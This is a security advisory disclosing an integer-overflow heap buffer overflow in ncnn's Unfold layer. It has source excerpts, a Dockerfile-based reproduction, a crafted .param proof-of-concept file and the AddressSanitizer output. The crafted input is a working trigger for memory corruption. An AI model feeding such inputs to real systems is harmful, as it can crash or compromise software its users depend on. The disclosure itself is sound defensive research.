Heap Buffer Overflow in Unfold Inference
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/unfold.cpp:79 in Unfold::forward
Sanitizer verdict: heap-buffer-overflow
Summary
A crafted .param file makes ncnnoptimize's shape-inference pass allocate an Unfold output tensor far smaller than the layer then writes. maxk is computed as kernel_w * kernel_h in a signed 32-bit int and used to size the allocation, but the copy loops iterate over kernel_h and kernel_w themselves. Choosing a kernel size whose product wraps modulo 2^32 gives a tiny buffer and an effectively unbounded write.
Detail
Unfold::load_param reads kernel_w = pd.get(1, 0); and kernel_h = pd.get(11, kernel_w); with no upper bound and no rejection of values that cannot form a real kernel. Unfold::forward then derives the allocation from their product while driving the write loops from the originals:
// src/layer/unfold.cpp:47
const int kernel_extent_w = dilation_w * (kernel_w - 1) + 1;
const int kernel_extent_h = dilation_h * (kernel_h - 1) + 1;
const int outw = (w - kernel_extent_w) / stride_w + 1;
const int outh = (h - kernel_extent_h) / stride_h + 1;
const int size = outw * outh;
const int maxk = kernel_w * kernel_h;
top_blob.create(size, maxk * channels, elemsize, opt.blob_allocator);
// src/layer/unfold.cpp:69
for (int u = 0; u < kernel_h; u++)
{
for (int v = 0; v < kernel_w; v++)
{
const float* sptr = img.row(dilation_h * u) + dilation_w * v;
for (int i = 0; i < outh; i++)
{
for (int j = 0; j < outw; j++)
{
ptr[0] = sptr[0];
The allocation height is maxk * channels, but the loop nest visits kernel_h * kernel_w * outh * outw positions and advances ptr once per position. Whenever kernel_w * kernel_h overflows int, those two quantities diverge and the write runs past the tensor. top_blob.empty() is checked, but the wrapped-to-small allocation succeeds.
The PoC uses 1=1431655766 11=3 against a 1x1x1 input, with 2=0 12=0 zeroing the dilations so kernel_extent_w and kernel_extent_h collapse to 1 and outw = outh = size = 1 — the layer looks harmless to every derived dimension. kernel_w * kernel_h is 4,294,967,298, which truncates to 2, so top_blob.create(1, 2, 4u) allocates two floats (an 84-byte region with ncnn's padding). The loop nest, still bounded by kernel_h = 3 and kernel_w = 1431655766, writes one float per iteration and leaves the region after 21 stores, then keeps going for billions more.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-unfold-inference && cd ncnn-poc-heap-buffer-overflow-in-unfold-inference
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'PARAM'
7767517
2 2
Input input 0 1 data 0=1 1=1 2=1
Unfold unfold 1 1 data out 1=1431655766 11=3 2=0 12=0
PARAM
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000154 at pc 0x59de7c03ec3a bp 0x7ffdc6fa3b00 sp 0x7ffdc6fa3af0
WRITE of size 4 at 0x50e000000154 thread T0
#0 0x59de7c03ec39 in ncnn::Unfold::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer/unfold.cpp:79
#1 0x59de73443f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#2 0x59de73435b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#3 0x59de734959e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#4 0x59de733273c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#5 0x59de733a4eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#6 0x71054ae001c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x71054ae0028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x59de73324624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e000000154 is located 0 bytes after 84-byte region [0x50e000000100,0x50e000000154)
allocated by thread T0 here:
#0 0x71054b479f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x59de733b968e in fastMalloc /ncnn/src/allocator.h:62
#2 0x59de733b968e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
#3 0x59de733f49c2 in ncnn::Mat::create(int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:371
#4 0x59de7c03df6e in ncnn::Unfold::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer/unfold.cpp:56
#5 0x59de73443f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#6 0x59de73435b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#7 0x59de734959e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#8 0x59de733273c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#9 0x59de733a4eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#10 0x71054ae001c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x71054ae0028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x59de73324624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/layer/unfold.cpp:79 in ncnn::Unfold::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const
Credit
Zheng Yu @ DepthFirst